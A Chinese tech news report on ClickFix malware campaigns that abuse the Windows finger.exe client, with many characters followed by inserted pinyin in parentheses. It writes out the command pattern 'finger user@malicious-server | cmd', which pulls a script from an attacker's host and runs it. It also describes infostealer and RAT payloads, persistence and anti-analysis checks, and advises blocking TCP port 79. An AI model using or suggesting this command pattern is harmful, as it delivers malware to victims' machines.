IT之家 11 月 16 日消息，科技媒體 bleepingcomputer 昨日（11 月 15 日）發布博文，報道稱近期有黑客濫用誕生約 40 年的“Finger”協議，成為新型 ClickFix 惡意軟件攻擊的關鍵環節。

IT之家注：“Finger”協議是一種非常早期的互聯網協議，誕生于上世紀 70 年代，主要功能是讓用戶查詢其他用戶的公開信息（如登錄名、最后上線時間等）。在現代網絡環境中已基本廢棄，但其客戶端程序（finger.exe）仍(reng)在某(mou)些操作系統（如 Windows）中保留(liu)。

攻擊(ji)者(zhe)利用(yong)(yong)該協議，在新型的 ClickFix 惡(e)意軟件(jian)攻擊(ji)中(zhong)，向受感染(ran)的 Windows 設備遠(yuan)程(cheng)下發并執行惡(e)意命(ming)令。Finger 協議最初用(yong)(yong)于在 Unix / Linux 系統(tong)上查詢用(yong)(yong)戶信息(xi)，后來(lai)也被集成(cheng)到 Windows 中(zhong)。

雖然如今已鮮(xian)有人使用，但其作為(wei)系統原生工(gong)具(ju)的(de)特性，讓其成為(wei)一種(zhong)理想的(de)“原生二進(jin)制程序（LOLBIN）”，能有效規避部分安(an)全軟件的(de)檢測。

攻(gong)擊的(de)核心在于社會(hui)工程學(xue)欺騙。攻(gong)擊者(zhe)會(hui)通(tong)過各(ge)種方(fang)式（如網頁彈窗）顯示(shi)一個偽造的(de)“人(ren)機驗證”提示(shi)，誘導用戶按下 Win+R 快(kuai)捷(jie)鍵并輸入一行看似無害的(de)命令(ling)。

該命令格式通常為 finger [用戶名]@[惡意服務器地址] | cmd。一旦用戶執行，Windows 系統內置的 finger.exe 程(cheng)序(xu)便會向指(zhi)定服務(wu)器發起請(qing)求，而服務(wu)器返回的并非用戶信(xin)息，而是(shi)一(yi)段預設的惡意腳本(ben)。

通過管道符 |，該腳本的輸出被直接傳遞給 Windows 命令處理器 cmd.exe 執行，從而完(wan)成(cheng)惡意代(dai)碼(ma)的遠程(cheng)投(tou)遞(di)。

惡意腳(jiao)本執行(xing)后(hou)，會立(li)即展開一系(xi)列后(hou)續動作。它首(shou)先會創建一個(ge)(ge)隨機命名(ming)的路徑，并下載(zai)一個(ge)(ge)偽裝成 PDF 文(wen)件的 ZIP 壓縮包。解壓后(hou)，其中的惡意載(zai)荷便會被(bei)激活(huo)。

根(gen)據(ju)分析，這些(xie)載荷主要分為兩類(lei)：一(yi)類(lei)是專門用(yong)于竊取(qu)用(yong)戶密(mi)碼、瀏覽器(qi)記錄(lu)等敏感數據(ju)的(de)信(xin)息(xi)竊取(qu)程序（Infostealer）；另一(yi)類(lei)則是功能更(geng)強(qiang)大的(de) NetSupport Manager 遠程訪問木(mu)馬（RAT），一(yi)旦植入(ru)，攻擊者便(bian)能完全控制受害(hai)者的(de)計算(suan)機。

為實現持(chi)久(jiu)化(hua)，該腳本還會創建一個計(ji)劃(hua)任務，確保惡意軟件在(zai)用戶每次登錄系統(tong)時都能自動運(yun)行(xing)。

研(yan)究人員發現(xian)，這種攻擊手法還在不斷(duan)演進。在一些更新(xin)的攻擊案例中，惡(e)意(yi)腳本在執行核心任務前(qian)，會先掃(sao)描(miao)受害者電腦中是否存在常見的惡(e)意(yi)軟件分析工具。

這些工(gong)具(ju)包(bao)括 Process Monitor、Wireshark、Fiddler、OllyDbg 等數十款。如果檢測到任何一款分(fen)析工(gong)具(ju)正在(zai)運行(xing)，腳本會立即終止執行(xing)，從而(er)增加安(an)全(quan)研究人員對(dui)其進(jin)行(xing)分(fen)析和追蹤(zong)的難(nan)度(du)。

由于此類攻擊依賴于 Finger 協(xie)(xie)議進行(xing)通信，而該協(xie)(xie)議使用(yong)專門的 TCP 79 端口，因此防御策略也相對明確(que)。對于絕大多數企(qi)業(ye)和(he)個人(ren)(ren)用(yong)戶而言，Finger 協(xie)(xie)議并無(wu)實際用(yong)途。因此，系(xi)統(tong)管理員(yuan)和(he)安全防護人(ren)(ren)員(yuan)應在網絡(luo)防火墻上阻(zu)止所有出站到 TCP 79 端口的流量(liang)。

廣告聲明(ming)：文內(nei)含(han)有(you)的對外跳轉鏈(lian)接(jie)（包括不限(xian)于超鏈(lian)接(jie)、二維碼、口令等形式），用于傳遞更多信(xin)息，節(jie)省甄選時間，結(jie)果僅供(gong)參考，IT之家(jia)所(suo)有(you)文章均包含(han)本(ben)聲明(ming)。